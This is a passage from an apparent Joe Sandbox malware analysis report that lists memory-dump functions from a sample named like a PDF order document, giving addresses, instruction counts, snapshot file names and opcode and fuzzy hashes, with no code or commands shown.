                                                                        • Instruction Fuzzy Hash: 0BE0867490910CEBC744DFD4D8409BDBFB8AB45310F14D1AAE99867351C7719E42DBA4
                                                                        Function 00DFF260 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ff6369d64267f568444b446b6e06c7f12b6da4e24e37c2cc6d1f6c58ed5043f
                                                                        • Instruction ID: d6996fa9cd06430910cd27897d764fdec58e788030147e78c78c3d8dbf86101c
                                                                        • Opcode Fuzzy Hash: 5ff6369d64267f568444b446b6e06c7f12b6da4e24e37c2cc6d1f6c58ed5043f
                                                                        • Instruction Fuzzy Hash: 42E0ED7590510CABCB44DF94D4405ACBBB4AB49310F14C1A9D89453351D6319A51DF54
                                                                        Function 047F9BF5 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5c042646eb75b0bf83cc0ef2ccceca270971e47a6e5bbaf5347b293b2ac2e48
                                                                        • Instruction ID: b28124ce7660e6c12529fae78a6b80d3a0aa9f442a692f7bbd6b928a0e06bc17
                                                                        • Opcode Fuzzy Hash: e5c042646eb75b0bf83cc0ef2ccceca270971e47a6e5bbaf5347b293b2ac2e48
                                                                        • Instruction Fuzzy Hash: EAF0B2B4E4122ACFDF60DF24DC84BADBBB1BB08304F1080E9A519A7244D7306E819F40
                                                                        Function 047FC3D0 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73995b0c3fc1955fe1b8200173084333a5f89384d9047124a73f865dc5390509
                                                                        • Instruction ID: b8ef9dcd778c836cfc2d0f9f58fb9005173a8e129bdd62f8438d196a941d8c8f
                                                                        • Opcode Fuzzy Hash: 73995b0c3fc1955fe1b8200173084333a5f89384d9047124a73f865dc5390509
                                                                        • Instruction Fuzzy Hash: 9EE0E57490520CEFCB55DF99D8809ACBBB4AB48310F10C1AAE854A3351D631AA56EB86
                                                                        Function 072E8D70 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28eae619960136c4a841073c51f168e10af6c8e18a66b9c61662a93b4a2a88e3
                                                                        • Instruction ID: fa68808b5272f532f53bf34a869973439ec350ded48f34bb6a396d004e6ee843
                                                                        • Opcode Fuzzy Hash: 28eae619960136c4a841073c51f168e10af6c8e18a66b9c61662a93b4a2a88e3
                                                                        • Instruction Fuzzy Hash: 2AE01A74D05208EBC744DFE8D4406ACBBB8AB49310F1491A9D85853381C6715A02DB81
                                                                        Function 047F7FC8 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9513738da8d126e3ca24b04cbff5eff483d2ea97bd6558c91b3b62cd7233844
                                                                        • Instruction ID: 5d4c06a5fa5e9eb25ab3421d3233b07bd783540c22b4f49bc689bfaad16cb2eb
                                                                        • Opcode Fuzzy Hash: c9513738da8d126e3ca24b04cbff5eff483d2ea97bd6558c91b3b62cd7233844
                                                                        • Instruction Fuzzy Hash: 11E0BF74A05108DFC784DFA9D945AACBBF4AB48314F1081A9D909D3351E771AA42DB51
                                                                        Function 047F6B60 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd3b6fa6f9376eeef7733db818fac5d88ef89d771825c1d8fd2402d9e698fe45
                                                                        • Instruction ID: d645bca4898f19d7c412845e450ef395f6a4e32c8c0928dc7fc37ac95de31d3b
                                                                        • Opcode Fuzzy Hash: dd3b6fa6f9376eeef7733db818fac5d88ef89d771825c1d8fd2402d9e698fe45
                                                                        • Instruction Fuzzy Hash: 47E0863491510CEBC704DF98D8409ACBB74EB45310F20D1A9DC4423350C7316E52DB84
                                                                        Function 072EE4E8 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f4e49312f25d4d5a9345ff54bbc1d4a86eb86c51cecf60765e041fba6a68acb
                                                                        • Instruction ID: b6a5fd4e5772de5d59785ac74900a8d3410065041a6a074fd31794b253d05104
                                                                        • Opcode Fuzzy Hash: 3f4e49312f25d4d5a9345ff54bbc1d4a86eb86c51cecf60765e041fba6a68acb
                                                                        • Instruction Fuzzy Hash: 76E0C2B4D19108DBC704DFD4E8456ACFBB8EB45310F10919CE80823341DB719E02CB80
                                                                        Function 072EB8D8 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d85e139626cca0092f8275e54292d72eb42403566d04409bbce04bd3f2814a0
                                                                        • Instruction ID: 766dacda00895a570c9b567a4bc2574a7aa7152f1511a6cb0771c41861c008be
                                                                        • Opcode Fuzzy Hash: 9d85e139626cca0092f8275e54292d72eb42403566d04409bbce04bd3f2814a0
                                                                        • Instruction Fuzzy Hash: 01E0C2B154110CABCB80EFF8DD006AE77F99B05300F4010A9D408A7110EE714A1097A6
                                                                        Function 047F1C70 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 46f44d50f72902089fa1e21f4372691cf3a4121c9c5c638eff83e5c63c09e8a0
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: FCE01234A09108DBC704DFD4E9815BCBBB4FB45324F509199D80827351DB71AE46DB85
                                                                        Function 047F1550 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: c0b5dcd41deab938f061187ebfdec8f0f9559f2d90b74fdbeb4f541a91b969db
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: ECE01274A09108DBCB04DFD4E9415ACBBB4EB45314F5091A9D84927351DB71BE42DB85
                                                                        Function 047F75D8 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: d513436f0c0cd8c4d3dd20f4bdee1324c0d79946bf731ac762b6d98dd8e9dcf8
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: A1E01274A09108DBC708DFE8E9415ACBBB8EB45314F10919DD81927351DB71BE42DB85
                                                                        Function 047F6E58 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 01cc425efbc6773e8247b7fe8d9769fa8b5533318944914be0651e7d8323f6fd
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 2EE01235A09108EBC704DFE5E9415ACBBB8FB45314F10919DD85827351DB716E43DB85
                                                                        Function 047FCE90 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 31ec859e5fad078722ef55916b9c435bd2f1c4ba1a74f7f190299598aaa8c3f5
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: BCE01234A0920CDFC704DFE4E9415ACBBB4FB85314F249199D80927351DB716E42DB85
                                                                        Function 047F5F18 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 706c67f50d1ca612cb9ff7ae43e90fbe73c39a4d11bd2182c48772c755c7b53c
                                                                        • Instruction ID: d4db800927f4f902dfe69e9cc1371ede09afd98b29476c5ce5fab223b8d91214
                                                                        • Opcode Fuzzy Hash: 706c67f50d1ca612cb9ff7ae43e90fbe73c39a4d11bd2182c48772c755c7b53c
                                                                        • Instruction Fuzzy Hash: 54E0127194110CABCB80EFF8D9006AE77F99B05310F1055A5D515A7250EE715A5097A6
                                                                        Function 047FC8B8 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 87f3688b80465667eb76a623ca19479aae41cd9b5c88f5f748627b11a20183e7
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 43E08C34A0910CEBC704DF94E8405ACBBB8BB45310F109199D80823340CB316E02DB80
                                                                        Function 047FD948 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: dd91f5d9c971d7522726cc352e850296f103915db4c733f4e65992c169780b0b
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 96E0C234A09108DBC704DFD4E8405ACBBB8EB45310F10919CD80937340CB316E02DB80
                                                                        Function 047F6900 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fea52d34606215a02166b30d14e14d4a5b673b06d54c0e6923ce23787ec6c02c
                                                                        • Instruction ID: 34644b5a652d0bf1f91f496ccc9ea3f7dd45def1c1209007a84dabe70d3da630
                                                                        • Opcode Fuzzy Hash: fea52d34606215a02166b30d14e14d4a5b673b06d54c0e6923ce23787ec6c02c
                                                                        • Instruction Fuzzy Hash: 85E0EC70D0520CEFCB40DBA898456ADBBF8AB04710F2051A99908A3750E7706B41D741
                                                                        Function 047F0A00 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 8cc8b1d2c13ad883d58c0ebfd80433eb3eabd0a165f6dc8354dd70f6b76d1ccc
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 04E01234A0910CDBCB14DFD4E9415ACFBB4EB45324F1091A9D81827351DB716E42DF85
                                                                        Function 047F7C88 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c84180075eabe81e09e6ccafd48ecb3ef7369c1d0e34ac5d24b2c49c7dfa8dc1
                                                                        • Instruction ID: 8bfd36bd72334dbb550433dd16e6946887d7d82f0b54fb3da0adb27b7f5af9be
                                                                        • Opcode Fuzzy Hash: c84180075eabe81e09e6ccafd48ecb3ef7369c1d0e34ac5d24b2c49c7dfa8dc1
                                                                        • Instruction Fuzzy Hash: BBE0C234905108DFC784DBE9D9402BCBFB8AB45311F1080D9D85853381EB31AE06DB40
                                                                        Function 047F48F8 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c84180075eabe81e09e6ccafd48ecb3ef7369c1d0e34ac5d24b2c49c7dfa8dc1
                                                                        • Instruction ID: 51104d59b490ef1b1d75940cc18e727ced288ce7497c5184719360eeca28a8be
                                                                        • Opcode Fuzzy Hash: c84180075eabe81e09e6ccafd48ecb3ef7369c1d0e34ac5d24b2c49c7dfa8dc1
                                                                        • Instruction Fuzzy Hash: EDE0C230A0910CDFC740DBE8D8402BCBFB4AB45310F1080D9D88863381EB71AF02DB40
                                                                        Function 047FB1B5 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f7f5fc1dce1fd9dcb2073479565fb624e33d0e1ee961d3db44154a8c30456ffd
                                                                        • Instruction ID: 50354edac8c22a16d1ac57c47df5a70c04cb59d4e6638fc8e6ad4058a0a51350
                                                                        • Opcode Fuzzy Hash: f7f5fc1dce1fd9dcb2073479565fb624e33d0e1ee961d3db44154a8c30456ffd
                                                                        • Instruction Fuzzy Hash: BCE0E5B190021CDBCB62CF54C850BEEBBBABB4D300F1451D9E649A3345D6349A848F65
                                                                        Function 047F6258 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c84180075eabe81e09e6ccafd48ecb3ef7369c1d0e34ac5d24b2c49c7dfa8dc1
                                                                        • Instruction ID: b1f6cdd1b61638bb3d1f678fb57c702311789411ab0f3b1dc550416290cecb59
                                                                        • Opcode Fuzzy Hash: c84180075eabe81e09e6ccafd48ecb3ef7369c1d0e34ac5d24b2c49c7dfa8dc1
                                                                        • Instruction Fuzzy Hash: A1E08C30909108DFCB40DBE8DA406ACBBB4AB06310F108099D84853391DB32AB02DB40
                                                                        Function 047F7F48 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec64667da60eb6bd0970cfc5a78b39744e38404db1a539cb79e6a0fb3df32b89
                                                                        • Instruction ID: 4d1c32f8a70937b14d276039553aa373a1586c7277870fc489ffd231102b1a35
                                                                        • Opcode Fuzzy Hash: ec64667da60eb6bd0970cfc5a78b39744e38404db1a539cb79e6a0fb3df32b89
                                                                        • Instruction Fuzzy Hash: DED05E3060A108DBC748CB95EC40A69B7B8EB46714F109098A80853391DB72AE02D680
                                                                        Function 072D0ABA Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bd2d2b89952c3f9e1f988230f1209d65c140f054377f3cce71198c9d67bd32f
                                                                        • Instruction ID: 9d3704f67f8acf8ca837d1cc99d2475b8b13f9cbe4f5aa70582ac7573297e054
                                                                        • Opcode Fuzzy Hash: 8bd2d2b89952c3f9e1f988230f1209d65c140f054377f3cce71198c9d67bd32f
                                                                        • Instruction Fuzzy Hash: C6D02EB0134246CFDB04EB21C81CA6A7761EF0A306F2480CCE00987243DEF908888F22
                                                                        Function 00DF0840 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 533d1ca12c62abbfa9168eaa77c37845aa11c042373823bf4988aecf457bf721
                                                                        • Instruction ID: 450d398c789705596a26c2bcdbbdaba1486dd57f53fcdff676468ecae53819d2
                                                                        • Opcode Fuzzy Hash: 533d1ca12c62abbfa9168eaa77c37845aa11c042373823bf4988aecf457bf721
                                                                        • Instruction Fuzzy Hash: C1C08C6C08F3C42FDB025770792BBD53F309B03200F0904CBD88581AF38155100F8712
                                                                        Function 072EE8B0 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e728999d454adcc9252a40d270bb9befd1afaa2e8d515de9f857f42b830132d
                                                                        • Instruction ID: a4cca5ae25d57fb67210f42ed24796e00291c2183c7a9cab5992fece673e2e30
                                                                        • Opcode Fuzzy Hash: 7e728999d454adcc9252a40d270bb9befd1afaa2e8d515de9f857f42b830132d
                                                                        • Instruction Fuzzy Hash: 93C08CB006B68A82E300A284B4483B437ACA343321F803400E20C100B10BA00080C24A
                                                                        Function 00DF09A8 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 015a622c2d412db1a2e52f526eae5069b0923515b2b1be5cd11f97baf9c068ae
                                                                        • Instruction ID: 41ee91ddb9bcc5b1e1429bd0326a3b2c1bbca7d88b13e355c3c156e2d7eb5b46
                                                                        • Opcode Fuzzy Hash: 015a622c2d412db1a2e52f526eae5069b0923515b2b1be5cd11f97baf9c068ae
                                                                        • Instruction Fuzzy Hash: 0ED0CA8291F3C01FDF43A770092840C7FB01D936B83080ACEC0A1CB1E3E95A040E8B22
                                                                        Function 047FA592 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7dd8a243227903ba48422623098104f6ee0bd55d5922e8ad5d8450eea80167ee
                                                                        • Instruction ID: 2de5ea685e31418a53731c9c5ab19c47d78999350f3cf55374e36a0083557dc3
                                                                        • Opcode Fuzzy Hash: 7dd8a243227903ba48422623098104f6ee0bd55d5922e8ad5d8450eea80167ee
                                                                        • Instruction Fuzzy Hash: 6AD0C9B4D0412C8FDB20DF24C884B9DBBB1BB44300F1042D5845CA3340E7301E84DF51
                                                                        Function 00DF0850 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 097dad5df0563a760e9157937d2ddd6b607e8e62c5c0cce38bc83d89b29479b0
                                                                        • Instruction ID: d06735d2e2fa4f50bab47a6d6344a552c1c289196529450176cf43a7b1ad5a3b
                                                                        • Opcode Fuzzy Hash: 097dad5df0563a760e9157937d2ddd6b607e8e62c5c0cce38bc83d89b29479b0
                                                                        • Instruction Fuzzy Hash: 3290023104460D8B46406BD57809556B76C95446157804051E50D415125BA664154595

                                                                        Non-executed Functions

                                                                        Function 00DFDDF0 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: 93987b8cf6e271ef38db313819b6171495d3a85848c68c8ca9166ad3c3ae53fb
                                                                        • Instruction ID: c5525acc111fb8fd8435bc9c5d5f9ff4a710e6e421133f130ecd69ea3bebd438
                                                                        • Opcode Fuzzy Hash: 93987b8cf6e271ef38db313819b6171495d3a85848c68c8ca9166ad3c3ae53fb
                                                                        • Instruction Fuzzy Hash: DC711C71E10208DFDB08EF6AE59069ABBF3FFC5300F18E529D5049B269EF3459458B51
                                                                        Function 00DFDE00 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
